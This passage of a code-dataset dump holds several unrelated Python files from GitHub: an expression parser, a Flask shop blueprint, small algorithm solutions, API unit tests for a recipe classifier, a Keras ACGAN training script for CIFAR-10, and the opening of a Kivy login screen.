BAS_OT_remove_custom_ui\n]\n","repo_name":"jfranmatheu/Atelier-Sculpt","sub_path":"AtelierSculpt/custom_ui/ops/ui_presets.py","file_name":"ui_presets.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"23238281428","text":"from typing import Callable\n\nfrom day1_lexer import TokenType, ParserError\n\nfrom .ast import *\nfrom .parser import FIRST_SET, Reader, parse_exp_list\n\n\ndef parse_exp(reader: Reader) -> Exp:\n return parse_or(reader)\n\n\ndef exp_parser_template(\n first_sym: set,\n upper: Callable[[Reader], Exp]\n ) -> Callable[[Reader], Exp]:\n \"\"\"\n Just a function builder.\n \"\"\"\n\n def parse_infix(reader: 
Reader) -> Exp:\n        \"\"\"\n        Parses an infix operation whose precedence is the same as 'mul' and 'div'.\n\n        Check source_grammar.cf for a definitive grammar guide. Note the\n        elimination of left recursions.\n        \"\"\"\n\n        def parse_partial(reader: Reader) -> Callable[[Exp], Exp]:\n            # since there is no AST node directly corresponding to the\n            # eliminated version of a binary operation, a bit of currying is\n            # used here for generalizability\n\n            if not reader.test_set(first_sym):\n                return lambda x: x\n\n            sym = reader.match(TokenType.OPERATOR)\n            end = upper(reader)\n\n            tail = parse_partial(reader)\n            build = lambda start, sym=sym, end=end: BinOp(sym, start, end)\n\n            return lambda x: tail(build(x))\n\n        start_exp = upper(reader)  # non-recursive non-terminals\n        return parse_partial(reader)(start_exp)\n\n    return parse_infix\n\n\ndef parse_exp_imm(reader: Reader) -> Exp:\n    \"\"\"\n    Parses a value whose construct has no binary operators (and therefore\n    of the highest precedence).\n    \"\"\"\n\n    # note that the idea of 'checking if the FIRST_SET contains the next token\n    # and then explicitly matching only one specific token' does not make much\n    # sense programmatically; however, in this case we are demonstrating the\n    # derivation of a production from another given the starting token, and\n    # therefore we abstract everything inside each 'if' switch as simply\n    # something that parses the given production derived from the tested\n    # FIRST_SET\n    if reader.test_set(FIRST_SET['literal']):\n        return Literal(reader.match(TokenType.LITERAL))\n\n    elif reader.test_set(FIRST_SET['unop_exp']):\n        return UnOp(reader.match(TokenType.OPERATOR), parse_exp_imm(reader))\n\n    elif reader.test_set(FIRST_SET['identifier']):\n        name = reader.match(TokenType.IDENTIFIER)\n\n        if reader.test('('):\n            reader.match('(')\n            params = parse_exp_list(reader)\n            reader.match(')')\n\n            return FuncCall(name, params)\n\n        return VarExp(name)\n\n    elif reader.test_set(FIRST_SET['paren_exp']):\n        reader.match('(')\n        value = parse_exp(reader)\n        reader.match(')')\n\n        return value\n\n    else:\n        raise ParserError(\n            f'Token {reader.peek()} does not match the first '\n            'set of immediate values'\n        )\n\n\nparse_term = exp_parser_template({'*', '/'}, parse_exp_imm)\nparse_numeric = exp_parser_template({'+', '-'}, parse_term)\nparse_compare = exp_parser_template({\n    '==', '!=', '<=', '>=', '<', '>'\n}, parse_numeric)\nparse_and = exp_parser_template({'&&'}, parse_compare)\nparse_or = exp_parser_template({'||'}, parse_and)","repo_name":"davidmaamoaix/language-and-compiler-course","sub_path":"day2_parser/exp_parser.py","file_name":"exp_parser.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"15665729672","text":"from flask import Blueprint, render_template, abort, redirect, request, make_response, url_for\r\nimport os\r\nfrom . 
import db_session\r\nfrom .category import Category\r\nfrom forms.product import ProductForm\r\nfrom .products import Products\r\nfrom .shops import Shops\r\nfrom .colors import Colors\r\nfrom .users import Users\r\nfrom data.email import generate_email\r\nfrom flask_login import current_user, login_required\r\nfrom datetime import date\r\n\r\n\r\nuser_api = Blueprint(\r\n 'user_api',\r\n __name__,\r\n template_folder='templates'\r\n)\r\ndb_session.global_init(f\"db/penguins.db\")\r\ndb_sess = db_session.create_session()\r\n\r\n\r\n@user_api.route('/my', methods=['GET', 'POST'])\r\n@login_required\r\ndef my():\r\n user = db_sess.query(Users).filter(Users.id == current_user.id).first()\r\n now = date.today()\r\n age = now - user.birthday\r\n if request.method == 'POST':\r\n if request.form['hidden'] == 'update':\r\n if current_user.check_password(request.form['password']):\r\n user.name = request.form['name']\r\n user.surname = request.form['surname']\r\n birthday = request.form['birthday'].split('-')\r\n user.birthday = date(year=int(birthday[0]), month=int(birthday[1]), day=int(birthday[2]))\r\n if user.email != request.form['email']:\r\n if db_sess.query(Users).filter(Users.email == request.form['email']).first():\r\n return render_template('my.html', title='Личный кабинет', user=current_user,\r\n message='Пользователь с такой почтой уже существует!', age=age)\r\n generate_email(request.form['name'], request.form['email'], url_for('confirmed', _external=True))\r\n user.email = request.form['email']\r\n db_sess.commit()\r\n return redirect('/my')\r\n return render_template('my.html', title='Личный кабинет', user=current_user,\r\n message='Неверный пароль!', age=age)\r\n shop = db_sess.query(Shops).filter(Shops.id == request.form['hidden']).first()\r\n user.shops.remove(shop)\r\n db_sess.delete(shop)\r\n db_sess.commit()\r\n return redirect('/my')\r\n return render_template('my.html', title='Личный кабинет', user=current_user, age=age)\r\n\r\n\r\n@user_api.route('/add_shop', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_shop():\r\n if request.method == 'POST':\r\n if db_sess.query(Shops).filter(Shops.title == request.form['title']).first() or \\\r\n db_sess.query(Shops).filter(Shops.email == request.form['email']).first():\r\n return render_template('add_shop.html', title='Создание магазина', user=current_user,\r\n message='Магазин с таким названием/почтой уже существует!')\r\n shop = Shops(title=request.form['title'],\r\n email=request.form['email'],\r\n user=current_user.id)\r\n db_sess.add(shop)\r\n db_sess.commit()\r\n user = db_sess.query(Users).filter(Users.id == current_user.id).first()\r\n user.shops.append(shop)\r\n db_sess.commit()\r\n return redirect('/my')\r\n return render_template('add_shop.html', title='Создание магазина', user=current_user)\r\n\r\n\r\n@user_api.route('/shop/', methods=['GET', 'POST'])\r\n@login_required\r\ndef shop(id):\r\n shop = db_sess.query(Shops).filter(Shops.id == id).first()\r\n category = db_sess.query(Category)\r\n colors = db_sess.query(Colors)\r\n if request.method == 'POST':\r\n if request.form['hidden'].startswith('update'):\r\n return redirect(f'/add_product/{id}-{int(request.form[\"hidden\"].split()[1])}')\r\n product = db_sess.query(Products).filter(Products.id == request.form['hidden']).first()\r\n shop.products.remove(product)\r\n db_sess.delete(product)\r\n db_sess.commit()\r\n return redirect(f'/shop/{id}')\r\n return render_template('shop.html', title=f'Магазин {shop.title}', current_user=current_user,\r\n shop=shop, 
category=category, colors=colors, Category=Category, Colors=Colors)\r\n\r\n\r\n@user_api.route('/add_product/-', methods=['GET', 'POST'])\r\n@user_api.route('/add_product/', methods=['GET', 'POST'], defaults={'id_prod': -1})\r\n@login_required\r\ndef add_product(id, id_prod):\r\n form = ProductForm()\r\n shop = db_sess.query(Shops).filter(Shops.id == id).first()\r\n category = db_sess.query(Category)\r\n colors = db_sess.query(Colors)\r\n if id_prod == -1:\r\n title = 'Добавление товара'\r\n product = Products()\r\n db_sess.commit()\r\n else:\r\n title = 'Редактирование товара'\r\n product = db_sess.query(Products).filter(Products.id == id_prod).first()\r\n if form.validate_on_submit():\r\n category = category.filter(Category.name == form.category.data).first()\r\n color = colors.filter(Colors.name == form.color.data).first()\r\n product.title = form.title.data.lower()\r\n product.category = category.id\r\n product.color = color.id\r\n product.shop = id\r\n product.price = form.price.data\r\n product.about = form.about.data\r\n product.rating, product.count = 0, 0\r\n if form.image.data.filename:\r\n f = form.image.data\r\n with open(os.path.abspath(os.path.join(os.path.dirname('static/img'), 'img', f.filename)), 'wb') as file:\r\n file.write(f.read())\r\n product.image = f'../static/img/{f.filename}'\r\n else:\r\n product.image = '../static/img/none.png'\r\n db_sess.add(product)\r\n db_sess.commit()\r\n shop.products.append(product)\r\n db_sess.commit()\r\n return redirect(f'/shop/{id}')\r\n return render_template('add_product.html', title=title,\r\n form=form, current_user=current_user, product=product,\r\n colors=colors, category=category,\r\n Colors=Colors, Category=Category)","repo_name":"FrogFairy/web-project","sub_path":"data/user_api.py","file_name":"user_api.py","file_ext":"py","file_size_in_byte":6261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4089459933","text":"N, K = map(int, input().split())\nfrom collections import deque\ndeq = deque([i+1 for i in range(N)])\njosephus = []\nwhile len(deq) != 0:\n for i in range(K-1):\n a = deq.popleft()\n deq.append(a)\n josephus.append(str(deq.popleft()))\nprint(f\"<{', '.join(josephus)}>\")\n","repo_name":"STR-HK/BOJ","sub_path":"class/2/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37284716295","text":"class Solution(object):\n def findWords(self, words):\n mappings={\n 1:'qwertyuiop',\n 2:\"asdfghjkl\",\n 3:\"zxcvbnm\"\n }\n flag=True\n res=[]\n for word in words:\n wordTemp=word.lower()\n if wordTemp[0] in mappings[1]:\n location=1\n elif wordTemp[0] in mappings[2]:\n location=2\n else:\n location=3\n for ch in wordTemp:\n if ch not in mappings[location]:\n flag=False\n break\n if flag:\n res.append(word)\n flag=True\n return res\n\n\ns=Solution()\nprint(s.findWords([\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]))","repo_name":"jiangshshui/leetcode","sub_path":"tenthPage/KeyboardRow_500.py","file_name":"KeyboardRow_500.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69878276587","text":"class Solution:\n def minCostClimbingStairs(self, cost):\n \"\"\"\n :type cost: List[int]\n :rtype: int\n \"\"\"\n return self.dp(cost, len(cost), {0: 0, 1: 0})\n\n def dp(self, cost, index, memo):\n if index in memo:\n return memo[index]\n else:\n 
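# top-down recurrence: the cheapest cost to reach this step comes from one of the two steps below\n            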
memo[index] = min(self.dp(cost, index - 1, memo) + cost[index - 1],\n self.dp(cost, index - 2, memo) + cost[index - 2])\n return memo[index]\n\n\ncost = [1, 100, 1, 1, 1, 100, 1, 1, 100, 1]\ns = Solution()\nprint(s.minCostClimbingStairs(cost))\n","repo_name":"hotheat/LeetCode","sub_path":"746. Min Cost Climbing Stairs/746.py","file_name":"746.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7931210267","text":"import unittest\n\nfrom fastapi.testclient import TestClient\n\nfrom api_models import PredictionItem\nfrom main import app, PredictProbaResponse\nfrom modelresolver import ModelResolver\n\n\nclass TestModelResolver(unittest.TestCase):\n \"\"\"\n Test class for the model resolver which tests loading and predictions\n \"\"\"\n resolver = ModelResolver()\n\n def test_get_model(self):\n self.assertTrue(self.resolver.get_model(\"lr\", \"style\"))\n\n def test_le_classes(self):\n self.assertTrue(self.resolver.encoders)\n self.assertGreater(len(self.resolver.encoders[-1].classes_), 0)\n\n def test_model_prediction(self):\n response = self.resolver.predict(model_name=\"lr\",\n data=\"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n model_type=\"style\")\n self.assertTrue(response.name == \"greek\")\n self.assertTrue(response.probability >= 0.90)\n\n def test_model_prediction_proba(self):\n response = self.resolver.predict_proba(model_name=\"lr\",\n data=\"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n model_type=\"style\")\n\n greek_filter_iter = filter(lambda x: x.name == \"greek\", response)\n assert next(greek_filter_iter, ).probability > 0.90\n\n def test_model_prediction_proba_allergen(self):\n response = self.resolver.predict_proba(model_name=\"lr\",\n data=\"niacin, contains or less of wheat gluten, yeast, cul, folic acid, reduced iron, water, thiamin mononitrate, unbleached enriched flour wheat flour, sugar, wheat flour, salt, barley malt flour, cultured corn syrup solids, distilled vinegar, riboflavin\",\n model_type=\"allergens\")\n\n gluten_filter_iter = filter(lambda x: x.name == \"gluten\", response)\n assert next(gluten_filter_iter, ).probability > 0.90\n\n\nclass TestRestApi(unittest.TestCase):\n \"\"\"\n Test class for RestApi\n \"\"\"\n client = TestClient(app)\n\n def test_read_main(self):\n response = self.client.get(\"/\")\n assert response.status_code == 200\n assert response.json() == {\"msg\": \"Hello World\"}\n\n def test_read_predict(self):\n response = self.client.post(\"/predict_style\",\n json={\"data\": \"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n \"model\": \"lr\"})\n print(response.json())\n assert response.status_code == 200\n\n predict_response = PredictionItem(**response.json())\n\n assert predict_response.name == \"greek\"\n assert predict_response.probability > 0.90\n\n def test_read_predict_proba(self):\n response = self.client.post(\"/predict_proba\",\n json={\"data\": \"romaine lettuce,black olive,grape tomato,garlic,pepper,purple onion,garbanzo bean,feta cheese crumbles\",\n \"model\": \"lr\",\n \"type\": \"style\"})\n print(response.json())\n assert response.status_code == 200\n\n predict_response = PredictProbaResponse(**response.json())\n greek_filter_iter = filter(lambda x: x.name == \"greek\", predict_response.predictions)\n\n assert 
len(predict_response.predictions) > 1\n assert next(greek_filter_iter, ).probability > 0.90\n\n def test_read_predict_proba_allergens(self):\n response = self.client.post(\"/predict_proba\",\n json={\"data\": \"niacin, contains or less of wheat gluten, yeast, cul, folic acid, reduced iron, water, thiamin mononitrate, unbleached enriched flour wheat flour, sugar, wheat flour, salt, barley malt flour, cultured corn syrup solids, distilled vinegar, riboflavins\",\n \"model\": \"lr\",\n \"type\": \"allergens\"})\n print(response.json())\n assert response.status_code == 200\n\n predict_response = PredictProbaResponse(**response.json())\n gluten_filter_iter = filter(lambda x: x.name == \"gluten\", predict_response.predictions)\n\n assert len(predict_response.predictions) > 1\n assert next(gluten_filter_iter, ).probability > 0.90\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"AndreasRoither/system-for-allergen-and-style-classification","sub_path":"ModelRestApi/src/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6577336115","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nfile: ACGAN - CIFAR10.py\r\nauthor: Luke\r\nde\r\nOliveira(lukedeo @ vaitech.io)\r\ncontributor: KnightTuYa(398225157 @ qq.com)\r\nConsult\r\nhttps: // github.com / lukedeo / keras - acgan\r\nfor MNIST version!\r\nConsult\r\nhttps: // github.com / soumith / ganhacks\r\nfor GAN trick!\r\nI directly use Minibatch Layer Code from:\r\nhttps://github.com/forcecore/Keras-GAN-Animeface-Character\r\nThanks for the great work!\r\nI am still not satisfied with the generated images yet, Any suggestion is welcomed!\r\n\"\"\"\r\nfrom __future__ import print_function\r\nimport os\r\nfrom collections import defaultdict\r\n\r\ntry:\r\n import cPickle as pickle\r\nexcept ImportError:\r\n import pickle\r\nfrom PIL import Image\r\nfrom six.moves import range\r\nimport keras.backend as K\r\nfrom keras.datasets import cifar10\r\nfrom keras import layers\r\nfrom keras.layers import Input, Dense, Reshape, Flatten, Embedding, Dropout, BatchNormalization\r\nfrom keras.layers.advanced_activations import LeakyReLU\r\nfrom keras.layers.convolutional import Conv2DTranspose, Conv2D\r\nfrom keras.models import Sequential, Model\r\nfrom keras.optimizers import Adam\r\nfrom keras.initializers import TruncatedNormal\r\nfrom keras.utils.generic_utils import Progbar\r\nfrom Minibatch import MinibatchDiscrimination\r\nimport matplotlib.pyplot as plt\r\nfrom keras.layers.noise import GaussianNoise\r\nimport numpy as np\r\n\r\nnp.random.seed(1337)\r\nclass_num = 10\r\nK.set_image_dim_ordering('th')\r\npath = \"images\" # The path to store the generated images\r\nload_weight = False\r\n# Set True if you need to reload weight\r\nload_epoch = 100 # Decide which epoch to reload weight, please check your file name\r\n\r\ndef build_generator(latent_size):\r\n # we will map a pair of (z, L), where z is a latent vector and L is a\r\n # label drawn from P_c, to image space (..., 3, 32, 32)\r\n cnn = Sequential()\r\n cnn.add(Dense(384 * 4 * 4, input_dim=latent_size, activation='relu',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(Reshape((384, 4, 4)))\r\n\r\n cnn.add(Conv2DTranspose(192, kernel_size=5, strides=2, padding='same', activation='relu',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n\r\n cnn.add(Conv2DTranspose(96, 
kernel_size=5, strides=2, padding='same', activation='relu',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n\r\n cnn.add(Conv2DTranspose(3, kernel_size=5, strides=2, padding='same', activation='tanh',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n\r\n # this is the z space commonly refered to in GAN papers\r\n latent = Input(shape=(latent_size,))\r\n\r\n # this will be our label\r\n image_class = Input(shape=(1,), dtype='int32')\r\n\r\n # 10 classes in CIFAR-10\r\n cls = Flatten()(Embedding(10, latent_size,\r\n embeddings_initializer='glorot_normal')(image_class))\r\n\r\n # hadamard product between z-space and a class conditional embedding\r\n h = layers.multiply([latent, cls])\r\n\r\n fake_image = cnn(h)\r\n\r\n return Model([latent, image_class], fake_image)\r\n\r\n\r\ndef build_discriminator():\r\n # build a relatively standard conv net, with LeakyReLUs as suggested in\r\n # the reference paper\r\n cnn = Sequential()\r\n\r\n cnn.add(GaussianNoise(0.05, input_shape=(3, 32, 32))) # Add this layer to prevent D from overfitting!\r\n\r\n cnn.add(Conv2D(16, kernel_size=3, strides=2, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(32, kernel_size=3, strides=1, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(64, kernel_size=3, strides=2, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(128, kernel_size=3, strides=1, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(256, kernel_size=3, strides=2, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Conv2D(512, kernel_size=3, strides=1, padding='same',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros'))\r\n cnn.add(BatchNormalization())\r\n cnn.add(LeakyReLU(alpha=0.2))\r\n cnn.add(Dropout(0.5))\r\n\r\n cnn.add(Flatten())\r\n\r\n cnn.add(MinibatchDiscrimination(50, 30))\r\n\r\n image = Input(shape=(3, 32, 32))\r\n\r\n features = cnn(image)\r\n\r\n # first output (name=generation) is whether or not the discriminator\r\n # thinks the image that is being shown is fake, and the second output\r\n # (name=auxiliary) is the class that the discriminator thinks the image\r\n # belongs to.\r\n fake = Dense(1, activation='sigmoid', name='generation',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros')(features)\r\n aux = Dense(class_num, activation='softmax', name='auxiliary',\r\n kernel_initializer='glorot_normal', bias_initializer='Zeros')(features)\r\n\r\n return Model(image, [fake, aux])\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # batch and latent size taken from the paper\r\n nb_epochs = 1000\r\n batch_size = 100\r\n latent_size = 110\r\n\r\n # Adam parameters suggested in https://arxiv.org/abs/1511.06434\r\n adam_lr = 0.0002\r\n adam_beta_1 = 0.5\r\n\r\n # build the discriminator, Choose Adam as optimizer according to GANHACK\r\n 
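# the two losses pair with D's two heads: 'generation' (real/fake) and 'auxiliary' (class label)\r\n    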
discriminator = build_discriminator()\r\n discriminator.compile(\r\n optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),\r\n loss=['binary_crossentropy', 'sparse_categorical_crossentropy']\r\n )\r\n generator = build_generator(latent_size)\r\n\r\n latent = Input(shape=(latent_size,))\r\n image_class = Input(shape=(1,), dtype='int32')\r\n\r\n # get a fake image\r\n fake = generator([latent, image_class])\r\n\r\n # we only want to be able to train generator for the combined model\r\n discriminator.trainable = False\r\n fake, aux = discriminator(fake)\r\n combined = Model([latent, image_class], [fake, aux])\r\n\r\n combined.compile(\r\n optimizer=Adam(lr=adam_lr, beta_1=adam_beta_1),\r\n loss=['binary_crossentropy', 'sparse_categorical_crossentropy']\r\n )\r\n\r\n (X_train, y_train), (X_test, y_test) = cifar10.load_data()\r\n X_train = (X_train.astype(np.float32) - 127.5) / 127.5\r\n X_test = (X_test.astype(np.float32) - 127.5) / 127.5\r\n nb_train, nb_test = X_train.shape[0], X_test.shape[0]\r\n\r\n train_history = defaultdict(list)\r\n test_history = defaultdict(list)\r\n\r\n if load_weight:\r\n generator.load_weights('params_generator_epoch_{0:03d}.hdf5'.format(load_epoch))\r\n discriminator.load_weights('params_discriminator_epoch_{0:03d}.hdf5'.format(load_epoch))\r\n else:\r\n load_epoch = 0\r\n\r\n for epoch in range(nb_epochs):\r\n print('Epoch {} of {}'.format(load_epoch + 1, nb_epochs))\r\n load_epoch += 1\r\n nb_batches = int(X_train.shape[0] / batch_size)\r\n progress_bar = Progbar(target=nb_batches)\r\n\r\n epoch_gen_loss = []\r\n epoch_disc_loss = []\r\n\r\n for index in range(nb_batches):\r\n progress_bar.update(index)\r\n # generate a new batch of noise\r\n noise = np.random.normal(0, 0.5, (batch_size, latent_size))\r\n\r\n # get a batch of real images\r\n image_batch = X_train[index * batch_size:(index + 1) * batch_size]\r\n label_batch = y_train[index * batch_size:(index + 1) * batch_size]\r\n\r\n # sample some labels from p_c\r\n sampled_labels = np.random.randint(0, class_num, batch_size)\r\n\r\n # generate a batch of fake images, using the generated labels as a\r\n # conditioner. 
We reshape the sampled labels to be\r\n # (batch_size, 1) so that we can feed them into the embedding\r\n # layer as a length one sequence\r\n generated_images = generator.predict(\r\n [noise, sampled_labels.reshape((-1, 1))], verbose=0)\r\n\r\n disc_real_weight = [np.ones(batch_size), 2 * np.ones(batch_size)]\r\n disc_fake_weight = [np.ones(batch_size), np.zeros(batch_size)]\r\n\r\n # According to GANHACK, we train our ACGAN-CIFAR10 as Real->D, Fake->D,\r\n # Noise->G, rather than the traditional method [Real, Fake]->D, Noise->G; actually,\r\n # it really makes sense!\r\n\r\n for train_ix in range(3):\r\n if index % 30 != 0:\r\n X_real = image_batch\r\n # Label Smoothing\r\n y_real = np.random.uniform(0.7, 1.2, size=(batch_size,))\r\n aux_y1 = label_batch.reshape(-1, )\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_real, [y_real, aux_y1]))\r\n # Label Smoothing\r\n X_fake = generated_images\r\n y_fake = np.random.uniform(0.0, 0.3, size=(batch_size,))\r\n aux_y2 = sampled_labels\r\n\r\n # see if the discriminator can figure itself out...\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_fake, [y_fake, aux_y2]))\r\n else:\r\n # make the labels noisy for the discriminator: occasionally flip the labels\r\n # when training the discriminator\r\n X_real = image_batch\r\n y_real = np.random.uniform(0.0, 0.3, size=(batch_size,))\r\n aux_y1 = label_batch.reshape(-1, )\r\n\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_real, [y_real, aux_y1]))\r\n # Label Smoothing\r\n X_fake = generated_images\r\n y_fake = np.random.uniform(0.7, 1.2, size=(batch_size,))\r\n aux_y2 = sampled_labels\r\n\r\n # see if the discriminator can figure itself out...\r\n epoch_disc_loss.append(discriminator.train_on_batch(X_fake, [y_fake, aux_y2]))\r\n # make new noise. 
we generate Guassian Noise rather than Uniform Noise according to GANHACK\r\n noise = np.random.normal(0, 0.5, (2 * batch_size, latent_size))\r\n sampled_labels = np.random.randint(0, class_num, 2 * batch_size)\r\n\r\n # we want to train the generator to trick the discriminator\r\n # For the generator, we want all the {fake, not-fake} labels to say\r\n # not-fake\r\n trick = np.random.uniform(0.7, 1.2, size=(2 * batch_size,))\r\n\r\n epoch_gen_loss.append(combined.train_on_batch(\r\n [noise, sampled_labels.reshape((-1, 1))], [trick, sampled_labels]))\r\n\r\n print('\\nTesting for epoch {}:'.format(load_epoch))\r\n\r\n # evaluate the testing loss here\r\n\r\n # generate a new batch of noise\r\n noise = np.random.normal(0, 0.5, (nb_test, latent_size))\r\n\r\n # sample some labels from p_c and generate images from them\r\n sampled_labels = np.random.randint(0, class_num, nb_test)\r\n generated_images = generator.predict(\r\n [noise, sampled_labels.reshape((-1, 1))], verbose=False)\r\n\r\n X = np.concatenate((X_test, generated_images))\r\n y = np.array([1] * nb_test + [0] * nb_test)\r\n aux_y = np.concatenate((y_test.reshape(-1, ), sampled_labels), axis=0)\r\n\r\n # see if the discriminator can figure itself out...\r\n discriminator_test_loss = discriminator.evaluate(\r\n X, [y, aux_y], verbose=False)\r\n\r\n discriminator_train_loss = np.mean(np.array(epoch_disc_loss), axis=0)\r\n\r\n # make new noise\r\n noise = np.random.normal(0, 0.5, (2 * nb_test, latent_size))\r\n sampled_labels = np.random.randint(0, class_num, 2 * nb_test)\r\n trick = np.ones(2 * nb_test)\r\n generator_test_loss = combined.evaluate(\r\n [noise, sampled_labels.reshape((-1, 1))],\r\n [trick, sampled_labels], verbose=False)\r\n\r\n generator_train_loss = np.mean(np.array(epoch_gen_loss), axis=0)\r\n\r\n # generate an epoch report on performance\r\n train_history['generator'].append(generator_train_loss)\r\n train_history['discriminator'].append(discriminator_train_loss)\r\n\r\n test_history['generator'].append(generator_test_loss)\r\n test_history['discriminator'].append(discriminator_test_loss)\r\n\r\n print('{0:<22s} | {1:4s} | {2:15s} | {3:5s}'.format(\r\n 'component', *discriminator.metrics_names))\r\n print('-' * 65)\r\n\r\n ROW_FMT = '{0:<22s} | {1:<4.2f} | {2:<15.2f} | {3:<5.2f}'\r\n print(ROW_FMT.format('generator (train)',\r\n *train_history['generator'][-1]))\r\n print(ROW_FMT.format('generator (test)',\r\n *test_history['generator'][-1]))\r\n print(ROW_FMT.format('discriminator (train)',\r\n *train_history['discriminator'][-1]))\r\n print(ROW_FMT.format('discriminator (test)',\r\n *test_history['discriminator'][-1]))\r\n\r\n # save weights every epoch\r\n generator.save_weights(\r\n 'params_generator_epoch_{0:03d}.hdf5'.format(load_epoch), True)\r\n discriminator.save_weights(\r\n 'params_discriminator_epoch_{0:03d}.hdf5'.format(load_epoch), True)\r\n\r\n # generate some pictures to display\r\n noise = np.random.normal(0, 0.5, (100, latent_size))\r\n sampled_labels = np.array([\r\n [i] * 10 for i in range(10)\r\n ]).reshape(-1, 1)\r\n generated_images = generator.predict([noise, sampled_labels]).transpose(0, 2, 3, 1)\r\n generated_images = np.asarray((generated_images * 127.5 + 127.5).astype(np.uint8))\r\n\r\n\r\n def vis_square(data, padsize=1, padval=0):\r\n\r\n # force the number of filters to be square\r\n n = int(np.ceil(np.sqrt(data.shape[0])))\r\n padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)\r\n data = np.pad(data, padding, mode='constant', 
constant_values=(padval, padval))\r\n\r\n # tile the filters into an image\r\n data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))\r\n data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])\r\n return data\r\n\r\n\r\n img = vis_square(generated_images)\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n Image.fromarray(img).save(\r\n 'images/plot_epoch_{0:03d}_generated.png'.format(load_epoch))\r\n\r\n pickle.dump({'train': train_history, 'test': test_history},\r\n open('acgan-history.pkl', 'wb'))\r\n","repo_name":"King-Of-Knights/Keras-ACGAN-CIFAR10","sub_path":"cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":15285,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"13907677419","text":"from kivy.app import App\nfrom kivy.uix.widget import Widget\nfrom kivy.lang import Builder\nfrom kivy.core.window import Window\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom MYSQL import *\nimport re\nfrom kivy.uix.image import AsyncImage\nfrom MYSQL import *\nBuilder.load_file('Kivy_file\\Login.kv')\n\nclass Login_Lay(Screen):\n\tdef Reg(self):\n\t\tuname=self.ids.uname.text\n\t\tpw=self.ids.pw.text\n\t\tif ( uname != \"\" and pw != \"\" ):\n\t\t\tif (re.match(\"^[a-zA-Z0-9_.-]+$\",uname)):\n\t\t\t\tresult=Check_PCE(\"persons\",uname)\n\t\t\t\tif not result:\n\t\t\t\t\tperson=Select_IC(\"persons\",uname)\n\t\t\t\t\t\n\t\t\t\t\tif person[2] == pw:\n\t\t\t\t\t\tself.manager.transition.direction = 'right'\n\t\t\t\t\t\tself.manager.current = 'Country'\n\t\t\t\t\t\t\n\t\telse :\t\n\t\t\tif (uname == \"\"):\n\t\t\t\tself.ids.uname.text=\"\"\n\t\t\t\tself.ids.uname.hint_text=\"You have not filled\"\n\t\t\t\tself.ids.uname.background_color=(1,0,0,1)\n\t\t\telse :\n\t\t\t\tself.ids.uname.background_color=(0,1,1,1)\n\t\t\tif (pw == \"\"):\n\t\t\t\tself.ids.pw.text=\"\"\n\t\t\t\tself.ids.pw.hint_text=\"You have not 